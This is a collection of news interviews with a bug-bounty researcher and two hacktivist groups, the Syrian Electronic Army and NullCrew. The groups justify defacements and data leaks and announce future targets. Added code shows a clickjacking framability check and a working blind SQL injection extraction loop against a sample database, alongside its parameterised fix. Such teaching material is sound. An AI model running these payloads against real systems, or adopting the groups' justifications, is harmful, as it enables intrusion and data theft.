
Exclusive Interview with Security Researcher Prakhar Prasad

Today, E Hacking News had a chance to interview Indian security researcher Prakhar Prasad, who recently received a $5,000 reward from PayPal for a file-upload vulnerability.

1. Introduce yourself
I'm Prakhar Prasad, 19 years old, from Ranchi, Jharkhand. I love playing with and breaking web application security. I've found critical vulnerabilities in the majority of popular websites, like Google, Facebook, Twitter, PayPal, Adobe, Apple, Symantec, Nokia-Siemens Networks, etc.

I'm also working on exploit writing, anti-virus evasion techniques and malware analysis.

2. How did you get into Information security field?

I got into information security when I was in class 10, because of an incident. One fine morning I was reading my local newspaper, and on its front page was a screenshot of my state government's website showing "Hacked by Ashiyane Digital Security Team". This incident fascinated me completely: how could someone change a website's homepage to show his own message? I started Googling around and then learnt how websites and such worked from a security point of view.

Then the love for information security took me to a whole new level. Sleepless nights, with a burning desire to learn as much as possible.


3. When did you start Bug hunting?

I started bug hunting back in July 2012.


4. What is your first finding , how did you feel at that time?

My first finding was a clickjacking bug in Google Website Translator Toolkit that allowed me to add an arbitrary "Admin/Editor" to someone's account by redressing the page.

5. What is the favorite vulnerability found by you?

Umm.. My favorite one is the Blind SQL Injection bug I found on PayPal's Notifications website. But I also like a permission bug I found in a PayPal acquisition that allowed me to unsubscribe any user of my choice from their mailing list.

6. How much have you earned so far from Bug hunting?

I'd keep it private :) But it's more than enough!

7. You're hunting bugs for fun, for profit, or to make the world a safer place?

I hunt bugs basically for fun and for keeping the world a safer place. But now various bug bounty programs have started that allow me to earn alongside the points I mentioned.

8. What are your future plans?

Can't say anything right now, I'm still learning things. But I want to do something really big for my country, India.

9. How did you feel when you received $5000 from Paypal?

It was a huge surprise. When my bug got validated I was expecting some big amount. But when the exact amount was paid, it was enormous.

10. What is your advice for new bug hunters?

Just use Google to learn everything from scratch; it is the most powerful tool to gain knowledge of ANY KIND. Don't opt for some Tom, Dick and Harry ethical hacking course; they teach half-baked concepts and suck your money. Google is the best thing to get started with; don't be like a spoon-fed child. I'd recommend a book called The Web Application Hacker's Handbook to start off.

One must watch Nir Goldshlager's HITBAMS2012 talk on Killing a Bug Bounty Program Twice. It's the best video out there regarding bug hunting.

Always remember: hunt bugs for fun and to learn more, not just for money. If you are honest with your work, you'll get fame, money and all success. But if you just use automated tools, then you're gonna have a hard time finding bugs and success in the InfoSec world.

Automated tools just can't find bugs in big websites, plus they kill the fun of finding bugs manually. Semi-automated/manual tools like Burp Suite and Zed Attack Proxy are cool to work with.


11. What do you think about E Hacking News?

It's a very good news source, keeps me updated about happenings of InfoSec world. I appreciate the work done by the team.

BreakTheSecurity is also doing a great job, in providing tutorials and similar stuff.

Keep the good work up!


12. Thank you. Is there anything else you want to add?

I'm very thankful to EHackingNews for providing me the platform to share my views and experiences!

If anyone wants to connect with me, I'm on Twitter: @prakharprasad

My best wishes to all learners and EHackingNews.
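The clickjacking finding mentioned in this interview depends on one precondition: the target page can be loaded inside an attacker's frame. The following is an added example for this page, not Prakhar Prasad's code and not anything from Google; it implements the check a tester runs on a response before attempting UI redressing, applying the browser precedence rule that a CSP `frame-ancestors` directive overrides `X-Frame-Options`. The header sets and the origins `https://app.example` and `https://evil.example` are constructed for illustration.

```python
"""
Decide whether an HTTP response can be framed by an attacker-controlled
origin, the precondition for clickjacking / UI redressing.
Added example; header values below are constructed, not captured.
"""
from urllib.parse import urlsplit


def _origin_matches(source: str, origin: str) -> bool:
    """Match one CSP host/scheme source expression against an origin.

    Handles '*', scheme-only sources (https:), exact origins and a leading
    wildcard label (https://*.example). 'self' and 'none' are handled by
    the caller because they need the page origin.
    """
    src = source.lower()
    o = urlsplit(origin.lower())
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:          # scheme source, e.g. https:
        return o.scheme == src[:-1]
    has_scheme = "://" in src
    s = urlsplit(src if has_scheme else "https://" + src)
    if has_scheme and s.scheme != o.scheme:
        return False
    if s.hostname is None or o.hostname is None:
        return False
    if s.hostname.startswith("*."):
        return o.hostname.endswith(s.hostname[1:])
    return s.hostname == o.hostname and s.port == o.port


def framable_by(headers: dict, page_origin: str, attacker_origin: str) -> bool:
    """True if attacker_origin may embed the page in an <iframe>.

    Precedence as browsers apply it: a CSP carrying frame-ancestors wins
    and X-Frame-Options is ignored; otherwise X-Frame-Options applies; with
    neither header the page is framable by anyone.
    """
    h = {k.lower(): v for k, v in headers.items()}
    same_origin = attacker_origin.lower() == page_origin.lower()
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        sources = [s.lower() for s in value.split()]
        if not sources or sources == ["'none'"]:       # empty list means 'none'
            return False
        for src in sources:
            if src == "'self'":
                if same_origin:
                    return True
            elif src == "'none'":
                continue
            elif _origin_matches(src, attacker_origin):
                return True
        return False                                   # directive present, no match
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return same_origin
    # ALLOW-FROM is obsolete; current browsers treat an unrecognised value
    # as if the header were absent, so the page stays framable.
    return True


# Constructed header sets, not captured from any real site.
CASES = {
    "no headers":     {},
    "xfo deny":       {"X-Frame-Options": "DENY"},
    "xfo sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp self only":  {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'",
                       "X-Frame-Options": "DENY"},      # CSP wins, XFO ignored
    "csp wildcard":   {"Content-Security-Policy": "frame-ancestors https://*.partner.example"},
}


def report(page: str = "https://app.example", attacker: str = "https://evil.example") -> dict:
    """Evaluate every constructed case for the given page and attacker origin."""
    return {name: framable_by(hdrs, page, attacker) for name, hdrs in CASES.items()}


if __name__ == "__main__":
    for name, framable in report().items():
        print(f"{name:16} framable by attacker: {framable}")
```

Only the "no headers" and wildcard-partner cases are interesting to an attacker; note that the "csp self only" case stays unframable even though `X-Frame-Options: DENY` is ignored, because `frame-ancestors 'self'` still excludes a foreign origin.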



An Interview with Syrian Electronic Army hacktivists


Today, E Hacking News interviewed the famous Syrian hacktivists "Syrian Electronic Army". The Syrian Electronic Army recently hacked the Twitter accounts of France24, Qatar Foundation and AFP.

*. Please introduce yourself to EHN readers
I'm a Syrian hacker called "The Pro", the leader of the special operations department in the Syrian Electronic Army.

*. Tell me something about your team
The Syrian Electronic Army is a group of Syrian youth who are trying to defend their country against the media campaign against Syria. Our mission is to spread the truth about what is really happening in Syria.

*. What are SEA's objectives?
We attack the media channels who are involved in what is happening in Syria. We spread the truth and publish our message to the world. The enemies of Syria are using the media as a tool to destroy Syria.

*. Why did you choose to become a hacktivist? What are your thoughts on hacktivism?
You know that more than 200 channels are covering the Syria crisis. The Syrian media are doing great, but the "bloody" media are stronger than it, so we chose the hacking way: to use their accounts, websites and emails as a weapon in our hands. Every channel has its followers, so we try to give these followers the truth instead of lies all the time.


*. What kind of methods do you use for attacking websites?
We use many methods to attack websites: attacking the host server, and targeting the domain owner, for example. For the social media accounts, we attack the mail server, like Sky News Arabia and AFP.


*. How many websites have you hacked so far?
We hacked too many websites, but there are very secure and powerful websites and there are normal websites.
http://zone-h.org/archive/special=1/notifier=SEA
http://www.zone-h.org/archive/notifier=The%20Pro

*. What is your next target? How do you choose your targets?
All the enemies of Syria are targets for us: governments, media channels, websites ....


*. Are you afraid of getting caught?
We are not doing something bad to get caught; we are defending our country. But we have 2 martyrs until now, killed by the "Free" army that pretends to the world that they are a "peaceful" opposition.


*. Is there anything else you would like to add?
No, thanks.

E Hacking News Interview with The hacker group NullCrew


Today, EHN had an interview with the hacktivist group NullCrew, who recently leaked data from the UN, Wasatch and the University of Wisconsin sites.

In the past, the group breached the World Health Organization (WHO), PBS, UNESCO Etxea, Ford, DHS's Study in the States, Sharp Electronics UK, University of North Carolina, Yale University, South Africa's leading ISP directory site and more.


Why did you attack those sites?

These servers are a part of the system, a system which is run by corrupt rich assholes. They mostly use their money for themselves,

no donations to the people who need the money, and if they do, it's just so people look at them in a kinder way, only for publicity.

Wasatch is a partner of Microsoft, run by Bill Gates; it was to target them as part of the system: their under-the-table dealings, the way they treat employees, taking full credit for certain things.

The United Nations attack, mainly because the UN is all nations together. And all nations are corrupt, whether the people see it or not; that is something we wish to stop. Those are the reasons.

wisc.edu became a target when they committed animal cruelty.

What kind of method did you use?

The methods were all SQL injection, of different techniques. WasatchIT and WasatchSoftware were two of the websites hosted on a shared host. The server contained a SQL injection, and the databases displayed were WasatchIT and WasatchSoftware.


We exploited [wisc.edu] via b-sqli. UN.org had an MSSQLi behind a WAF, which we had to bypass to gain access to the databases and the data itself.

What is your next target?
Our next big release will be on February 14th, yes, yes; VALENTINE'S DAY! It'll be the official release of #FuckTheSystem Valentine's Day, and one target I will tell you is the Pentagon.

But our next single release will be a multiple-target release, on United States government servers, retaliating against #OperationFastAndFurious. How many more need to die from weapons the government is putting into criminals' hands?

What is your ultimate goal? What do you hope to achieve by hacking these websites?
Our ultimate goal is to make the people of the system stand and revolt, and to prove that #FuckTheSystem is not a joke. For people to finally live without fear, to be able to bring others into the world without fear.

Have you seen any results after your campaigns?
After our UNESCO Etxea defacement, with the song "Everything Is Corrupt", there were comments upon comments from people posting #FuckTheSystem from whatever country they lived in. So yes, we have seen results.

How many websites have you hacked so far?
To be honest, at least 150+. We've outlived most groups and been highly active.
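Both the PayPal Notifications bug in the first interview and NullCrew's "b-sqli" (blind SQL injection) against wisc.edu belong to the blind SQL injection class, where the application never echoes query results and the attacker has only a yes/no oracle. Neither interview gives any technical detail, so the following is a generic added example written for this page, not code from either party and not any real site's schema: a deliberately vulnerable lookup on a constructed in-memory SQLite database, the boolean-based extraction loop that recovers a column value one character at a time through it, and the parameterised version of the same lookup against which the identical payloads recover nothing. The table, column and key values are constructed.

```python
"""
Boolean-based blind SQL injection against a vulnerable lookup, and the
parameterised query that closes it.  Added example on a constructed
SQLite database; not taken from any site or group mentioned on this page.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a users table holding a secret to extract."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_key TEXT)")
    con.executemany("INSERT INTO users (name, api_key) VALUES (?, ?)",
                    [("alice", "k3y-al1ce"), ("admin", "s3cr3t!")])
    con.commit()
    return con


def user_exists_vulnerable(con: sqlite3.Connection, name: str) -> bool:
    """The bug: untrusted input is pasted into the SQL text.  The caller only
    learns whether a row came back, which is exactly the one-bit oracle a
    blind injection needs."""
    sql = f"SELECT id FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchone() is not None


def user_exists_fixed(con: sqlite3.Connection, name: str) -> bool:
    """The fix: the value travels as a bound parameter, never as SQL."""
    row = con.execute("SELECT id FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


# Character set to brute-force per position; anything outside it ends extraction.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789!-_"


def extract_api_key(oracle, victim: str = "admin", max_len: int = 32) -> str:
    """Recover users.api_key for `victim` one character at a time.

    Each probe closes the original string literal with a quote, ORs in a
    condition on one character of the target column, and comments out the
    trailing quote of the original query with '--'.  The oracle returns True
    only when that condition holds, so each True answer leaks one character.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in ALPHABET:
            payload = (f"' OR (SELECT substr(api_key,{pos},1) FROM users "
                       f"WHERE name='{victim}') = '{ch}'-- ")
            if oracle(payload):
                recovered += ch
                found = True
                break
        if not found:                 # no candidate matched: end of string
            break
    return recovered


def demo() -> tuple:
    """Run the same extraction against the vulnerable and the fixed lookup."""
    con = make_db()
    leaked = extract_api_key(lambda p: user_exists_vulnerable(con, p))
    blocked = extract_api_key(lambda p: user_exists_fixed(con, p))
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable endpoint leaked:", leaked)
    print("parameterised endpoint leaked:", repr(blocked))
```

The extraction needs one request per candidate character per position (a few hundred for a short key here), which is why real blind injections are usually automated and why rate limiting alone is not a fix; binary search over character codes cuts the request count but does not change the principle. The parameterised lookup stops it entirely because the payload is compared as a literal username and never parsed as SQL.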